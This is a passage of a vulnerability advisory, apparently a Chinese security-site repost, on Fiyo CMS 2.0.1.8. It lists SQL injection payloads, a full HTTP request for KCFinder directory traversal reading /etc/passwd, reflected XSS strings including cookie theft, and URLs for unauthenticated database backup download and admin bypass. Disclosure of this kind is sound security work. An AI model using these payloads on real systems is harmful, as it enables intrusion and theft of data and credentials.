Fiyo CMS 2.0.1.8多个漏洞(4)

Parameter: username
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: act=user&username=test' AND 5514=5514 AND 'KTqH'='KTqH

Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: act=user&username=test' AND SLEEP(5) AND 'UjqT'='UjqT

--------------------------------------------------------------------
 Directory Traversal - kcfinder plugins - CVE-2014-1222
 --------------------------------------------------------------------

FiyoCMS was identified to be using an outdated KCFinder plugin which vulnerable to directory traversal attack.

POST /fiyo//plugins/plg_kcfinder/browse.php?type=files&lng=en&act=download HTTP/1.1
 Host: 192.168.248.132
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Referer: ?type=files
 Cookie: PHPSESSID=0nij9ucentr8p4ih41d0p61476; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 34

dir=files&file=../../../../../../../etc/passwd

----------------------------------------------------
 Reflected XSS  - CVE-2014-9146
 ----------------------------------------------------

?app=article&view=item31ab2"><script>alert(1)</script>0ccba&id=186
?app=article&view=item&id=18690fdb"><script>alert(1)</script>d99c9
?page=5eac15eac1"><script>alert(1)</script>774f2
?app=article95ce1"><script>alert(1)</script>298ab&view=item&id=186
?app=module&act=edit%22%3E%3C/script%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&id=5

 ----------------------------------------------------
 Direct URL Access - CVE-2014-9147
 ----------------------------------------------------
 To download database backup without any authentications required.
[db_backup.sql filename]

----------------------------------------------------
 Access Control Bypass - CVE-2014-9148
 ----------------------------------------------------

To access super administrator functions "Install & Update" and "Backup" by administrator user, just go directly to the URL below:
  1. ?app=config&view=backup
  2. ?app=config&view=install

建议：
厂商补丁：

Fiyo CMS
 --------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：